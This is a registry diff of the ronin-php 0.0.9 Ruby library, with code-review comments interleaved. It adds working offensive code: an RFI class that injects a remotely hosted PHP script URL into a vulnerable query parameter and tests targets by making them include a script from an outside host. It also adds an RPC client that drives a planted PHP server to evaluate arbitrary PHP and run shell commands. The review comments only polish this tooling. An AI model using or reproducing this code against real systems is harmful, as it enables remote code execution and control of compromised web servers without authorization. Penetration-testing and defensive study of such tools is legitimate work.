ronin-php 0.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- data/COPYING.txt +339 -0
- data/History.txt +10 -0
- data/Manifest.txt +36 -0
- data/README.txt +70 -0
- data/Rakefile +19 -0
- data/lib/ronin/php.rb +27 -0
- data/lib/ronin/php/extensions.rb +24 -0
- data/lib/ronin/php/extensions/string.rb +42 -0
- data/lib/ronin/php/lfi.rb +28 -0
- data/lib/ronin/php/lfi/exceptions.rb +24 -0
- data/lib/ronin/php/lfi/exceptions/unknown_target.rb +31 -0
- data/lib/ronin/php/lfi/extensions.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri/http.rb +58 -0
- data/lib/ronin/php/lfi/file.rb +86 -0
- data/lib/ronin/php/lfi/lfi.rb +245 -0
- data/lib/ronin/php/lfi/target.rb +344 -0
- data/lib/ronin/php/rfi.rb +25 -0
- data/lib/ronin/php/rfi/extensions.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri/http.rb +54 -0
- data/lib/ronin/php/rfi/rfi.rb +127 -0
- data/lib/ronin/rpc/php.rb +28 -0
- data/lib/ronin/rpc/php/call.rb +45 -0
- data/lib/ronin/rpc/php/client.rb +152 -0
- data/lib/ronin/rpc/php/console.rb +42 -0
- data/lib/ronin/rpc/php/response.rb +63 -0
- data/lib/ronin/rpc/php/rfi.rb +46 -0
- data/lib/ronin/rpc/php/shell.rb +70 -0
- data/spec/spec_helper.rb +5 -0
- data/static/rfi/test.php +27 -0
- data/static/rpc/server.php +482 -0
- data/tasks/helpers.rb +1 -0
- data/tasks/helpers/minify.rb +54 -0
- data/tasks/spec.rb +7 -0
- data/tasks/static.rb +34 -0
- metadata +132 -0
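--- a/data/lib/ronin/php/rfi/rfi.rb
+++ b/data/lib/ronin/php/rfi/rfi.rb
@@ -0,0 +1,127 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/network/http'
+require 'ronin/extensions/uri'
+require 'ronin/formatting/digest'
+require 'ronin/chars'
+
+module Ronin
+module PHP
+class RFI
+
+# Default URL of the RFI Test script
+TEST_SCRIPT = 'http://ronin.rubyforge.org/dist/php/rfi/test.php'
+
+# Prefix text that will appear before the random RFI challenge string
+CHALLENGE_PREFIX = 'PHP RFI Response: '
+
+# RFI vulnerable url
+attr_reader :url
+
+# RFI vulnerable query parameter
+attr_reader :param
+
+# Whether to terminate the RFI script url with a null byte
+attr_accessor :terminate
+
+# URL of the RFI Test script
+attr_accessor :test_script
+
+#
+# Creates a new RFI object with the specified _url_, _param_ and given
+# _options_.
+#
+# _options may contain the following keys:
+# <tt>:terminate</tt>:: Whether or not to terminate the RFI script url
+# with a null byte. Defaults to +true+.
+# <tt>:test_script</tt>:: URL of RFI test script. Defaults to
+# TEST_SCRIPT.
+#
+def initialize(url,param,options={})
+@url = url
+@param = param
+
+if options.has_key?(:terminate)
+@terminate = options[:terminate]
+else
+@terminate = true
+end
+
+@test_script = (options[:test_script] || TEST_SCRIPT)
+end
+
+#
+# Returns +true+ if the RFI script url will be terminated with
+# a null byte, returns +false+ otherwise.
+#
+def terminate?
+@terminate == true
+end
+
+#
+# Builds a RFI url to include the specified _script_url_.
+#
+def url_for(script_url)
+script_url = URI(script_url.to_s)
+new_url = URI(@url.to_s)
+
+new_url.query_params.merge!(script_url.query_params)
+script_url.query_params.clear
+
+script_url = "#{script_url}?" if terminate?
+
+new_url.query_params[@param.to_s] = script_url
+return new_url
+end
+
+#
+# Include the specified RFI _script_ using the given _options_.
+#
+def include(script,options={})
+options = options.merge(:url => url_for(script))
+
+if options[:method] == :post
+return Net.http_post_body(options)
+else
+return Net.http_get_body(options)
+end
+end
+
+#
+# Returns +true+ if the url is vulnerable to RFI, returns +false+
+# otherwise.
+#
+def vulnerable?(options={})
+challenge = Chars.alpha_numeric.random_string(10).md5
+
+test_url = URI(@test_script.to_s)
+test_url.query_params['rfi_challenge'] = challenge
+
+response = include(test_url,options)
+return response.include?("#{CHALLENGE_PREFIX}#{challenge}")
+end
+
+end
+end
+end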
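Review bot: `url_for` appends a `?` to the script url when `terminate?` holds, yet the `:terminate` option, the `terminate` accessor and `terminate?` itself are all documented as terminating the url with a null byte, so the comments and the code disagree and a caller reading the docs will expect a different suffix on the wire. Suggest making the comments describe what the code does, e.g. `# Whether to append a trailing '?' to the RFI script url`, or adding a comment explaining why `?` was chosen over the null byte the option name suggests. `terminate?` also tests `@terminate == true`, so any other truthy value assigned through the `terminate` accessor is reported as false; `!!@terminate` would give the boolean semantics the docs describe.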
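--- a/data/lib/ronin/rpc/php.rb
+++ b/data/lib/ronin/rpc/php.rb
@@ -0,0 +1,28 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/rpc/php/call'
+require 'ronin/rpc/php/client'
+require 'ronin/rpc/php/console'
+require 'ronin/rpc/php/shell'
+require 'ronin/rpc/php/rfi'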
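--- a/data/lib/ronin/rpc/php/call.rb
+++ b/data/lib/ronin/rpc/php/call.rb
@@ -0,0 +1,45 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/rpc/call'
+require 'ronin/formatting/binary'
+
+require 'xmlrpc/client'
+
+module Ronin
+module RPC
+module PHP
+class Call < RPC::Call
+
+#
+# Encodes the call and the given _session_ variables into a base64
+# encoded XMLRPC call message.
+#
+def encode(session={})
+XMLRPC::Create.new.methodCall(@name,session,*(@arguments)).base64_encode
+end
+
+end
+end
+end
+end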
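Review bot: `encode` places the session hash as the first positional parameter ahead of `@arguments`, so the wire format of every call relies on the server splitting that leading hash from the real arguments, and nothing in the method says so. Suggest a comment above the `methodCall` line, `# session hash travels as the first param; the server is expected to strip it before dispatching`, since a caller whose first real argument is itself a Hash is otherwise indistinguishable from the session. Separately, `xmlrpc` stopped being part of Ruby's default standard library in 2.4 and ships as a separate gem, so `require 'xmlrpc/client'` needs that gem declared as a dependency on current Rubies.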
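--- a/data/lib/ronin/rpc/php/client.rb
+++ b/data/lib/ronin/rpc/php/client.rb
@@ -0,0 +1,152 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/rpc/php/call'
+require 'ronin/rpc/php/response'
+require 'ronin/rpc/php/console'
+require 'ronin/rpc/php/shell'
+require 'ronin/rpc/client'
+require 'ronin/network/http'
+
+module Ronin
+module RPC
+module PHP
+class Client < RPC::Client
+
+# URL of RPC server
+attr_reader :url
+
+# Proxy to send requests through
+attr_accessor :proxy
+
+# User-Agent string to send with each request
+attr_accessor :user_agent
+
+# Session data
+attr_reader :session
+
+# Provides a console service
+service :console, Console
+
+# Provides a shell service
+service :shell, Shell
+
+#
+# Creates a new Client object with the specified _url_ and the
+# given _options_.
+#
+# _options_ may contain the following keys:
+# <tt>:proxy</tt>:: The proxy settings to use when communicating
+# with the server.
+# <tt>:user_agent</tt>:: The User-Agent to send to the server.
+# <tt>:user_agent_alias</tt>:: The User-Agent alias to send to
+# the server.
+#
+def initialize(url,options={})
+@url = url
+
+@proxy = options[:proxy]
+
+if options[:user_agent_alias]
+@user_agent = Web.user_agent_alias[options[:user_agent_alias]]
+else
+@user_agent = options[:user_agent]
+end
+
+@cookie = nil
+@session = {}
+end
+
+def call_url(call_object)
+new_url = URI(@url.to_s)
+new_url.query_params['rpc_call'] = call_object.encode(@session)
+
+return new_url
+end
+
+#
+# Returns +true+ if the RPC server is running and responding to
+# function calls, returns +false+ otherwise.
+#
+def running?
+call(:running)
+end
+
+#
+# Returns a finger-print of the PHP server.
+#
+def fingerprint
+call(:fingerprint)
+end
+
+protected
+
+#
+# Creates a new Call object for the specified _funtion_ and
+# _arguments_.
+#
+def create_call(function,*arguments)
+Call.new(function,*arguments)
+end
+
+#
+# Sends the specified _call_object_ to the RPC server. Returns
+# a new Response object that represents the server's response.
+#
+def send_call(call_object)
+resp = Net.http_get(:url => call_url(call_object),
+:cookie => @cookie,
+:proxy => @proxy,
+:user_agent => @user_agent)
+
+new_cookie = resp['Set-Cookie']
+@cookie = new_cookie if new_cookie
+
+return Response.new(resp.body)
+end
+
+#
+# Returns the return-value of a previous function call encoded
+# into the specified _response_. If the _response_ contains
+# a fault message, the fault exception will be raised.
+#
+def return_value(response)
+status, params = response.decode
+
+@session.merge!(params['session'])
+
+if params.has_key?('output')
+print(params['output'])
+end
+
+return params['return_value']
+end
+
+end
+end
+end
+end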
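Review bot: `return_value` calls `@session.merge!(params['session'])` without checking that the key is present, so a response that decodes cleanly but carries no `session` entry fails with a `TypeError` from `merge!(nil)` instead of a meaningful error; `@session.merge!(params['session'] || {})` keeps the session untouched in that case, or raise explicitly if a session entry is mandatory. The `print(params['output'])` just below writes whatever the remote server returned straight to the local terminal, so a hostile or compromised server can push terminal control sequences at the operator; filtering non-printable characters before printing, or returning the output to the caller rather than printing inside a protected helper, would contain that. `send_call` also stores the raw `Set-Cookie` header value, attributes such as `path`/`expires` included, and replays it as the `:cookie` option; only the leading `name=value` pair belongs in a `Cookie` header, e.g. `@cookie = new_cookie.split(';').first if new_cookie`, and note that `resp['Set-Cookie']` joins multiple cookies into one string.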
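--- a/data/lib/ronin/rpc/php/console.rb
+++ b/data/lib/ronin/rpc/php/console.rb
@@ -0,0 +1,42 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/rpc/console'
+
+module Ronin
+module RPC
+module PHP
+class Console < RPC::Console
+
+#
+# Evaluates the specified _string_ of PHP code and returns the
+# result.
+#
+def eval(string)
+call(:eval,string)
+end
+
+end
+end
+end
+end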
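--- a/data/lib/ronin/rpc/php/response.rb
+++ b/data/lib/ronin/rpc/php/response.rb
@@ -0,0 +1,63 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/rpc/exceptions/response_missing'
+require 'ronin/rpc/response'
+
+require 'xmlrpc/client'
+
+module Ronin
+module RPC
+module PHP
+class Response < RPC::Response
+
+#
+# Returns the default XML parser to use for parsing XMLRPC
+# responses.
+#
+def Response.parser
+@@parser ||= XMLRPC::XMLParser::REXMLStreamParser.new
+end
+
+def Response.parser=(new_parser)
+@@parser = new_parser
+end
+
+#
+# Decodes the XMLRPC response message embedded in the response
+# from the server.
+#
+def decode
+response = @contents[/<rpc>.*<\/rpc>/m]
+
+unless response
+raise(ResponseMissing,"failed to receive a valid RPC method response",caller)
+end
+
+return Response.parser.parseMethodResponse(response)
+end
+
+end
+end
+end
+end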
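Review bot: `Response.parser` memoizes into the class variable `@@parser`, which is shared with every subclass of `Response`, so a subclass that assigns `parser=` silently replaces the parser for all of them; a class instance variable, `def self.parser; @parser ||= XMLRPC::XMLParser::REXMLStreamParser.new; end` with a matching `def self.parser=(new_parser); @parser = new_parser; end`, keeps each override local to its class. The match in `decode` uses greedy `.*` under `/m`, so a body containing two `<rpc>` sections yields the span from the first opening tag to the last closing tag; `/<rpc>.*?<\/rpc>/m` picks the first complete section. Since the text handed to `parseMethodResponse` comes straight from the remote server, the `parser=` setter deserves a comment noting that any replacement parser must cope with untrusted, possibly malformed XML.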